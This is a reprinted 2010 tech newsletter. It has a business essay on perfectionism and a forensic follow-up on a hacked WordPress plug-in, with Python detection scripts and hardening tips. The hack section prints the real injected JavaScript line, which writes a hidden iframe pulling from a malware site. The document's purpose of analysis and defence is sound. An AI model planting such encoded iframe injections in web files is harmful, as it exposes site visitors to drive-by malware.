PERFECTION PARALYSIS
This is a reprint of a recent article under our Business Bits section of the Technical Tidbits™ Newsletter. I was asked by a subscriber to put it online so it can be accessed by non-subscribers.
If you like the article, I recommend that you fill in your e-mail address on the upper right and click the subscribe button to subscribe to our newsletters.
Technical Tidbits™ Newsletter
February, 2010
I was agonizing over what to write about in this portion of the newsletter when a conference call this morning provided me with the content!
This particular call involved me, a staff member that we call our resident marketing guru, and a gentleman he had connected with that needed some help. As it was explained to me, the man needed my help because he had all this content and was not selling a thing.
The first warning signal I received about this man’s issue was that he had published two books on his area of expertise and refused to sell them on Amazon because they require a commission. I asked if he had sold any on his own, to which he replied, “a few.”
Before I could hit him with the fact that Amazon would be much better at reaching an audience than he could ever hope to reach, he said something that made everything quite clear. He said that much of his accompanying material was not perfected yet and therefore he couldn’t proceed with the sales of his books or his courses until it had been “perfected.”
Now, to back step a moment here, my degree is in Applied Behavioral Science and I/O Psychology (Industrial/Organizational). I took that educational path because it is what corporate trainers do, which was what I wanted to do in my career – train people in technology. Much of what I learned was not only about how people learn, but about barriers to learning. Oftentimes, these barriers are emotional or psycho-social and lie within the person themselves.
For example, I was once hired by Motorola Corporation to personally tutor an executive assistant 1-on-1 in the fine art of using PowerPoint. Within two visits to this young lady’s desk, I told Motorola that she was untrainable. There was nothing wrong with her mind; she was a very bright young woman. What was wrong was that she was unwilling to learn. She had a mindset that PowerPoint presentations were beneath her and therefore had no intention of ever learning it. Administrative assistants did PowerPoint presentations – not executive assistants!
That being said, I recognized a pattern in this gentleman on the conference call. So I probed further. The man has literally hundreds of training courses and material available but has not sold a single item. His insistence on the fact that none of the developed materials had been “perfected” and the constant reaffirmation that his content was so unique that it couldn’t be sold the way I was suggesting (online) led me straight to his problem.
So, I asked him if he knew of some very powerful people in his field and I named the names of 5 people I knew carried a lot of weight in his area of expertise. He agreed that he indeed knows of them and that they were fine examples of the field. I then went on to inform him that these 5 people were selling EXACTLY the way I was telling him to sell his material. These people were involved in online marketing, had a website, engaged in social media, and so on.
He reiterated that he could not sell online.
I know many of you reading this are shaking your head because you know how well online marketing and sales works and you know that your business probably lives and dies by it!
But the point I want to make is that this man was not blind to the opportunities technology is offering him; he’s suffering from Perfection Paralysis.
One of the comments he made during the conversation was that he was spending much of his time packaging and shipping his content. (To whom, I don’t know, because he still said he wasn’t selling anything!) So, I defused this objection and told him to go check out CafePress.com. They have an excellent print-on-demand program that could free up his time.
But again, when our marketing guru pressed him to take one step forward into the online arena, objection after objection came back to the fact that it needed “perfecting.”
I don’t know about you, but I know I’m guilty of that same paralysis in my own business. The newsletter has to be just perfect or I can’t send it. The course has to be just perfect or I can’t post it and sell it. And so on…
When you get caught in the trap of Perfection Paralysis in your business, there is a tip you can take away from Bill Gates and Microsoft. If Bill Gates and Microsoft waited for the operating systems and products they produce to be perfect, do you think you’d be reading this on a Windows operating system? Do you think Microsoft would have become such a large corporation?
Now don’t get me wrong! I’m not telling you to plan your business model around Microsoft and issue products that require patch after patch and only work some of the time. That’s not my point.
My point is that sometimes it just has to be GEFN – Good Enough For Now.
And with that closing comment, I’m going to take my own advice and get this newsletter sent!
Follow-up on WordPress .htaccess Hack
In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.
First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.
I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.
During my investigation, I was told about another interesting development: another user of the same web hosting service had been hacked in a similar way.
So now I was looking into a server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites, but that leads us to the issue of the web hosting company making sure they are protecting their users!
I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users. So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)
That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!
I pored over the SQL database dump for over 48 hours (not consecutively) and compared WP files like wp-config.php and such, and could not find anything except a strange base64-65 code that I could not isolate.
I searched online for other answers and read report after report of how hacks were being done, and still could not find it.
I looked at individual plug-in JPG files and uploaded JPG files to see whether they were actually pictures or spoofed file names containing actual code. Still nothing.
After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!
Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.
The code resided in a plug-in called I Love Social Bookmarking, and the affected file resided in: wp-content/plugins/i-love-social-bookmarking/includes/
The actual file was named: ilsb.js
The normal ilsb.js file should read:
// JavaScript Document
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );
    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});
The hacked code within Sam’s file read:
// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );
    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});
The offending code is the document.write line, the one with all the percent signs (%): unescape() turns that percent-encoded string back into HTML before it is written into the page.
This code inserted a zero-size (hidden) iframe at the top of the page, which pulled content from a malware site.
Because of this, Sam was starting to get blacklisted on Google and Bing, and her site was beginning to be blocked by software that uses Google’s malware detection, including Firefox!
I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.
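The injection above is easy to miss by eye because the payload is percent-encoded. The following scanner is an added example (not code from the original post or from the plug-in): it finds document.write(unescape('...')) calls in a JavaScript file, tolerating the odd spacing in "document .write", decodes the string the way a browser's unescape() would, and flags any decoded iframe, especially a zero-size one. The sample hacked file below is constructed with a placeholder domain.

```python
import re

# document.write(unescape('...')) with any whitespace, e.g. "document .write".
WRITE_UNESCAPE = re.compile(
    r"document\s*\.\s*write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)

def js_unescape(s):
    """Decode like JavaScript's unescape(): %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def find_injected_iframes(js_source):
    """Return one finding per decoded payload that contains an <iframe>.
    'hidden' is True when width or height is 0, the usual drive-by sign."""
    findings = []
    for m in WRITE_UNESCAPE.finditer(js_source):
        decoded = js_unescape(m.group(2))
        if not re.search(r"<\s*iframe", decoded, re.IGNORECASE):
            continue
        hidden = bool(re.search(r'(width|height)\s*=\s*["\']?0["\']?', decoded, re.IGNORECASE))
        src = re.search(r'src\s*=\s*["\']([^"\']+)', decoded, re.IGNORECASE)
        findings.append({"src": src.group(1) if src else None,
                         "hidden": hidden, "decoded": decoded})
    return findings

# Constructed sample input: same shape as the hacked ilsb.js, placeholder domain,
# percent-encoded exactly as the real injection was.
IFRAME_HTML = ('<iframe src="http://malware.example/menu.php" width="0" '
               'height="0" frameborder="0"></iframe>')
ENCODED = "".join("%%%02X" % ord(c) for c in IFRAME_HTML)
CLEAN_JS = "// JavaScript Document\njQuery(document).ready(function(){});\n"
HACKED_JS = ("// JavaScript Document\ndocument .write(unescape('" + ENCODED +
             "'));\njQuery(document).ready(function(){});\n")

if __name__ == "__main__":
    for name, src in (("clean", CLEAN_JS), ("hacked", HACKED_JS)):
        print(name, find_injected_iframes(src))
```

Run it over every .js file under wp-content and compare the decoded src against what the plug-in is supposed to load; a clean file yields an empty list.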
But here is your take-away from this experience: secure your WP blog!
- Remove the Admin account: log in and set up a new administrator account with a totally different name, and assign it administrator privileges.
- Log out and log back in under the new name.
- Delete the admin account. WordPress will ask whether you’d like to assign its posts to another user; assign them to your new user name.
- Install the Bad Behavior plug-in and configure it properly. If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!
- Make sure you configure Akismet and get its API key.
- Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet; suffice it to say that I believe spam comments with links may be key in this method.
- Make sure that all users – if you allow them to register – are configured to be subscribers only!
- If you suspect foul play of any sort, search for a hidden user. To do that:
  - Click on your Users section.
  - Click on the link to the Administrators page.
  - Right click on the page and choose: View Source.
  - Look for the following code on that source page: tbody id="users". It should be toward the bottom. If you have 1 registered administrator, there should be only one name in that list. If you have 2, there should be only two names, and so on.
  - If you find an extra one, you will have to delete this person out of your SQL database.
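The hidden-user check above can be scripted against a saved copy of the Administrators page source. This is an added example, not code from the post or from WordPress: it walks the tbody id="users" element the post tells you to look for and reports any login that is not on your list of known administrators. The row layout (a td with class "username" holding the login) and the sample page source are constructed for this example.

```python
from html.parser import HTMLParser

class AdminListParser(HTMLParser):
    """Collect logins from <tbody id="users"> on the Users > Administrators page.
    Assumes (constructed layout) each row has a <td class="username"> cell."""
    def __init__(self):
        super().__init__()
        self.in_users = False   # inside <tbody id="users">
        self.in_name = False    # inside a username cell
        self.names = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "tbody" and attrs.get("id") == "users":
            self.in_users = True
        elif self.in_users and tag == "td" and "username" in (attrs.get("class") or ""):
            self.in_name = True

    def handle_endtag(self, tag):
        if tag == "tbody" and self.in_users:
            self.in_users = False
        elif tag == "td" and self.in_name:
            self.in_name = False

    def handle_data(self, data):
        if self.in_name and data.strip():
            self.names.append(data.strip())

def unexpected_admins(page_html, known_admins):
    """Return administrator logins on the page that you did not create."""
    parser = AdminListParser()
    parser.feed(page_html)
    return sorted(set(parser.names) - set(known_admins))

# Constructed page source: one legitimate admin plus a hidden second one.
SAMPLE_HTML = """<table><tbody id="users">
<tr><td class="username">sam</td><td>Sam</td></tr>
<tr><td class="username">wp_svc</td><td></td></tr>
</tbody></table>"""

if __name__ == "__main__":
    print(unexpected_admins(SAMPLE_HTML, ["sam"]))
```

Any name the script returns is a candidate for removal from the database; confirm it is not an account you or a colleague created before deleting it.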
I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!
TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/773545
And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357
*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!
Talk To Me LIVE!
Talk to me LIVE this Wednesday, February 10th at 10 AM CDT on my BlogTalk Radio show!
The Official Blurb:
Everyone’s got questions! – Ask your question on this special episode of Technical Tidbits with Debbie Mahler. One full hour of taking your questions either on the phone or in the live chat! You’ll have access to your own technical guru for a full hour FREE! And as she tells her students: The only stupid question is the one left unasked! Get your questions answered!
Everyone from advanced techies to Grandma — who just wants to download photos of her grandbabies from Facebook — will hear something of value on this special edition of Technical Tidbits with Debbie Mahler.
It’s all about YOUR Frequently Asked Questions. And that means questions from you, our loyal and beloved listeners. So phone in or chat live! Here’s your chance to have all your burning technology questions answered by the expert.
Join me LIVE!
Call In Phone Number: (718) 506-1315
Or go to the show page: Technical Tidbits on BlogTalk Radio, and scroll down to see the live chat box!